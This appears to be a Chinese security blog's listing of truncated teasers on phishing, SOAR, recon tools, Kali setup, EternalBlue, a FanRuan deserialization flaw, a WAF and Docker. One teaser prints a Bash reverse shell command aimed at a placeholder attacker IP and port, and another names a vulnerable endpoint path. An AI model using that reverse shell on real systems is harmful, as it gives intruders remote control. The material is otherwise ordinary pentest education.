前言目前越来越多的红蓝对抗中，钓鱼邮件攻击使用的越来越频繁，也是比较高效打点的一种方式，常见的钓鱼邮件攻击一种是直接通过二维码，内嵌链接、直接索要敏感信息等方式钓运维人员、内部人员...

ZBN SOAR介绍ZBN SOAR是什么?ZBN SOAR是安全编排的自动化响应平台，将安全产品以及安全流程链接整合起来，通过预定义的工作流（Workflow）和剧本（Playbook）来标准化事故的调查处置流程，提升...

介绍斗象 TCC 团队正式发布「ARL 资产安全灯塔」开源版，该项目现已上线开源社区 GitHub。ARL 旨在快速侦察与目标关联的互联网资产，构建基础资产信息库。协助甲方安全团队或者渗透测试人...

一、介绍W5 是一个面向企业安全与运维设计的 低代码 自动化平台，可以让团队降低 人工成本，提升 工作效率。可以把代码 图形化、可视化、可编排。让不同的系统，不同的组件通过 APP 进行封装形...

官方镜像下载地址：https://www.kali.org/downloads一、虚拟机配置使用虚拟机软件：VMware Workstation Pro 16首先点击创建新的虚拟机，先择典型(推荐)完成选择后点击下一步这里我们选择稍后安...

一、Bash介绍     Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下：bash -i >&/dev/tcp/攻击机_IP/攻击机端...

漏洞简介EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。漏洞影响范围Windows Server 2000 SP0 x86...

漏洞说明：帆软 V10 及 V11 版本报表软件存在反序列化漏洞，攻击者可利用该漏洞使用POST 方法向帆软报表软件路径/webroot/decision/remote/design/channel 发送恶意数据包，将二进制数据流或文...

一、介绍什么是雷池雷池（SafeLine）是长亭科技耗时近 10 年倾情打造的 WAF，核心检测能力由智能语义分析算法驱动。Slogan: 不让黑客越雷池半步。什么是 WAFWAF 是 Web Application Firewall 的...

一、Docker介绍Docker是一种开放源代码平台，用于自动化应用程序的打包、发布和管理。它基于容器化技术，可以将应用程序及其所有依赖项打包为一个独立的、可移植的容器。这个容器将应用程序和相...